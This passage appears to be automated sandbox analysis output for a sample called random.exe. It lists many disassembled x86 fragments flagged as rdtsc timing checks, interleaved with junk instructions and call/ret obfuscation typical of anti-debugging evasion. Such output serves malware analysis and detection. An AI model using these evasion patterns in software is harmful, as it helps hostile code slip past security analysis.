0x00000074 lea ebx, dword ptr [ebp+1244F081h] 0x0000007a mov ecx, dword ptr [ebp+122D2D66h] 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F3C153246E0h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A3DC second address: 83A407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, dword ptr [ebp+122D18D6h] 0x0000000d push 00000000h 0x0000000f jmp 00007F3C150B756Dh 0x00000014 call 00007F3C150B7569h 0x00000019 pushad 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A407 second address: 83A437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3C153246E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F3C153246D8h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A437 second address: 83A43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A43B second address: 83A43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A43F second address: 83A473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F3C150B756Ch 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 js 00007F3C150B7566h 0x0000001c jmp 00007F3C150B7571h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A473 second address: 83A479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A479 second address: 83A47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A47D second address: 83A481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A481 second address: 83A4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000003h 0x0000000b mov dword ptr [ebp+122D2FD2h], esi 0x00000011 pushad 0x00000012 sub dword ptr [ebp+122D29A1h], ecx 0x00000018 mov edi, dword ptr [ebp+122D2C2Ch] 0x0000001e popad 0x0000001f push 00000000h 0x00000021 jne 00007F3C150B756Ch 0x00000027 push 00000003h 0x00000029 mov edi, dword ptr [ebp+122D2D28h] 0x0000002f push 8036A0DCh 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F3C150B756Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A4C9 second address: 83A512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3FC95F24h 0x00000010 mov si, di 0x00000013 lea ebx, dword ptr [ebp+1244F08Ah] 0x00000019 jnl 00007F3C153246D9h 0x0000001f mov si, di 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F3C153246DFh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A512 second address: 83A518 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A518 second address: 83A53C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F3C153246E6h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A53C second address: 83A541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A617 second address: 83A63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F3C153246E7h 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A63E second address: 83A643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A643 second address: 83A6E5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3C153246DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F3C153246DFh 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F3C153246D8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 sub cl, 0000000Ch 0x00000035 mov esi, eax 0x00000037 push 00000003h 0x00000039 jmp 00007F3C153246E2h 0x0000003e push 00000000h 0x00000040 mov edx, dword ptr [ebp+122D32A5h] 0x00000046 push 00000003h 0x00000048 pushad 0x00000049 jmp 00007F3C153246E9h 0x0000004e or dword ptr [ebp+122D35FBh], eax 0x00000054 popad 0x00000055 call 00007F3C153246D9h 0x0000005a push ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d je 00007F3C153246D6h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A6E5 second address: 83A6F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A6F3 second address: 83A753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F3C153246E9h 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jmp 00007F3C153246E8h 0x00000017 push ebx 0x00000018 jmp 00007F3C153246E6h 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A753 second address: 83A75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3C150B7566h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 83A75E second address: 83A794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 sub di, 9998h 0x0000000e lea ebx, dword ptr [ebp+1244F095h] 0x00000014 mov dword ptr [ebp+122D1C67h], esi 0x0000001a xchg eax, ebx 0x0000001b push ebx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jl 00007F3C153246D6h 0x00000025 popad 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007F3C153246DCh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 859034 second address: 859038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 859038 second address: 85903E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85903E second address: 859048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3C150B7566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 859048 second address: 859080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F3C153246E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8591E4 second address: 8591FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C150B7572h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85932E second address: 859344 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jbe 00007F3C153246D6h 0x0000000f jp 00007F3C153246D6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 859344 second address: 859364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3C150B7566h 0x0000000a jmp 00007F3C150B7576h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8597AF second address: 8597C3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3C153246D6h 0x00000008 jmp 00007F3C153246DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8597C3 second address: 8597C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8597C9 second address: 8597D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C153246DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85AA5B second address: 85AA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85AA5F second address: 85AA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85AD0C second address: 85AD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85AD12 second address: 85AD18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85AD18 second address: 85AD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F3C150B7568h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85AD2A second address: 85AD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85D506 second address: 85D50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85D50A second address: 85D51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F3C153246D6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85D51C second address: 85D52C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F3C150B7566h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85D52C second address: 85D532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85E9FE second address: 85EA08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 85EA08 second address: 85EA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8648C5 second address: 8648C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8648C9 second address: 8648EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007F3C153246D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8648EE second address: 8648F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 864A5F second address: 864A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F3C153246E2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86505D second address: 865063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 865063 second address: 865068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8651ED second address: 86520E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F3C150B7578h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86520E second address: 86521B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86521B second address: 86525B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3C150B7566h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F3C150B7576h 0x00000014 jmp 00007F3C150B7574h 0x00000019 jp 00007F3C150B7566h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 868857 second address: 86889F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F3C153246E2h 0x0000000f jng 00007F3C153246DCh 0x00000015 jng 00007F3C153246D6h 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F3C153246DCh 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 push eax 0x00000028 jmp 00007F3C153246E5h 0x0000002d pop eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86889F second address: 8688FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F3C150B756Ah 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F3C150B7568h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c call 00007F3C150B756Dh 0x00000031 movzx esi, si 0x00000034 pop esi 0x00000035 push 37902DADh 0x0000003a push eax 0x0000003b push edx 0x0000003c jns 00007F3C150B7568h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 868E22 second address: 868E44 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3C153246D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F3C153246DCh 0x00000012 jo 00007F3C153246DCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 869568 second address: 869581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 869581 second address: 86958C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3C153246D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 869604 second address: 869608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8697B9 second address: 8697C3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3C153246DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 869869 second address: 869882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3C150B7572h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 869BAD second address: 869BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc esi, 05AED44Bh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F3C153246D8h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86A0C4 second address: 86A0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86A0D1 second address: 86A0D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86B8C8 second address: 86B8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86B8CF second address: 86B94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F3C153246D8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+124553D1h], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F3C153246D8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 push 00000000h 0x00000046 call 00007F3C153246E6h 0x0000004b jmp 00007F3C153246DBh 0x00000050 pop esi 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop edi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86CE74 second address: 86CE80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86CE80 second address: 86CE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86CE86 second address: 86CE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86D9EE second address: 86D9F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3C153246D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86E55D second address: 86E568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3C150B7566h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86E568 second address: 86E56D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86E56D second address: 86E573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86E573 second address: 86E580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86E580 second address: 86E584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86E584 second address: 86E600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F3C153246D8h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F3C153246D8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F3C153246E8h 0x0000002d push 00000000h 0x0000002f stc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F3C153246D8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D318Fh] 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jnc 00007F3C153246D8h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F053 second address: 86F058 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86ED97 second address: 86ED9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F058 second address: 86F0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F3C150B7568h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2981h], edx 0x0000002a push 00000000h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e jmp 00007F3C150B7575h 0x00000033 push eax 0x00000034 push eax 0x00000035 pop eax 0x00000036 pop eax 0x00000037 popad 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007F3C150B7578h 0x00000041 jmp 00007F3C150B7572h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86ED9D second address: 86EDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C153246DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F0C0 second address: 86F0C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F0C6 second address: 86F0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
